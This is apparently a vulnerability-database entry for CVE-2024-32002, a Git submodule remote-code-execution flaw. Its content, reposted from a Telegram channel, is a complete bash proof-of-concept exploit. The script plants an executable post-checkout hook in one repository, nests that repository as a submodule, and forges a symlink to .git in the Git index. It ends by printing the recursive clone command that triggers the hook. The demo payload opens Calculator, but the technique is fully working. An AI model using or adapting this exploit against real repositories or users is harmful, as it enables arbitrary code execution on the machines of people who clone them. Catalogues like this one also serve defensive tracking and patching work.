{"uuid": "4c602947-85c9-4f9c-9d09-58c19503e089", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-32002", "type": "published-proof-of-concept", "source": "https://t.me/Hunt3rkill3rs1/252", "content": "CVE-2024-32002 GIT RCE\n\n\u0423\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u0432 \u043f\u043e\u0434\u043c\u043e\u0434\u0443\u043b\u044f\u0445 Git.\nPayload \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0430\u043a\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u043d \u0447\u0435\u0440\u0435\u0437 \u0440\u0435\u043a\u0443\u0440\u0441\u0438\u0432\u043d\u043e\u0435 \u043a\u043b\u043e\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u044f Git.\n\u26d4\n\n#!/bin/bash\n\n# Define repository paths\nHULK_REPO=\"git@github.com:safebuffer/hulk.git\"\npullme_REPO=\"git@github.com:safebuffer/submod.git\"\n\n# Final Exploit Repo\nSMASH_REPO=\"git@github.com:safebuffer/smash.git\"\n\n# Function to clone and set up the hook repository\nsetup_HULK_REPO() {\n # Remove existing directories\n rm -rf hulk*\n\n git clone \"$HULK_REPO\" hulk\n\n # Navigate to the hook repository\n cd hulk/ || exit\n\n # Create necessary directories and set up the post-checkout hook\n mkdir -p y/hooks\n cp ./.git/hooks/post-update.sample y/hooks/post-checkout # so u won't get the hook ignored\n echo \"/System/Applications/Calculator.app/Contents/MacOS/Calculator\" > y/hooks/post-checkout\n\n # Add and commit the post-checkout hook\n git add y/hooks/post-checkout\n git update-index --chmod=+x y/hooks/post-checkout\n git commit -m \"Add executable post-checkout hook\"\n\n # Push changes to the remote repository\n git push\n\n # Return to the parent directory\n cd ..\n}\n\n# Function to clone and set up the pullme repository with a submodule\nsetup_pullme_repo() {\n # Remove existing directories\n rm -rf pullme*\n\n # Clone the pullme repository\n git clone \"$pullme_REPO\" pullme\n\n # Navigate to the pullme repository\n cd pullme || exit\n\n # Clean up previous directories and remove submodule\n rm -rf a* A*\n git rm -r A/modules/x\n\n # Add the hook repository as a submodule\n git submodule add --name x/y \"$HULK_REPO\" A/modules/x\n git commit -m \"Add submodule\"\n\n # Create a symlink to the .git directory\n # Print the string \".git\" to a file named dotgit.txt\n printf .git > dotgit.txt\n\n # Generate a hash for the contents of dotgit.txt and store it in dot-git.hash\n # The `-w` option writes the object to the object database, and the hash is output\n git hash-object -w --stdin < dotgit.txt > dot-git.hash\n\n # Create an index info line for a symbolic link with the mode 120000\n # The line is formatted as: \"120000  0\\ta\"\n # 120000 indicates a symbolic link,  is the content hash, and 'a' is the path in the index\n printf \"120000 %s 0\\ta\\n\" \"$(cat dot-git.hash)\" > index.info\n\n # Update the git index with the information from index.info\n # This effectively stages the symbolic link for the next commit\n git update-index --index-info < index.info\n\n # Commit the staged changes with a message \"Add symlink\"\n git commit -m \"Add symlink\"\n # Push changes to the remote repository\n git push\n\n # Return to the parent directory\n cd ..\n}\n\n# Function to clone the smash repository with submodules\nshow_command() {\n  # Define color codes\n  RED='\\033[0;31m'\n  GREEN='\\033[0;32m'\n  YELLOW='\\033[0;33m'\n  BLUE='\\033[0;34m'\n  NC='\\033[0m' # No Color\n\n  # Output the command with colors\n  echo -e \"${GREEN}Trigger the exploit with ${NC}:\\n\"\n  echo -e \"${YELLOW}git clone --recursive ${BLUE}$SMASH_REPO ${RED}GITRCE${NC}\"\n}\n\n# Execute functions\nsetup_HULK_REPO\nsetup_pullme_repo\nshow_command", "creation_timestamp": "2024-05-19T19:29:11.000000Z"}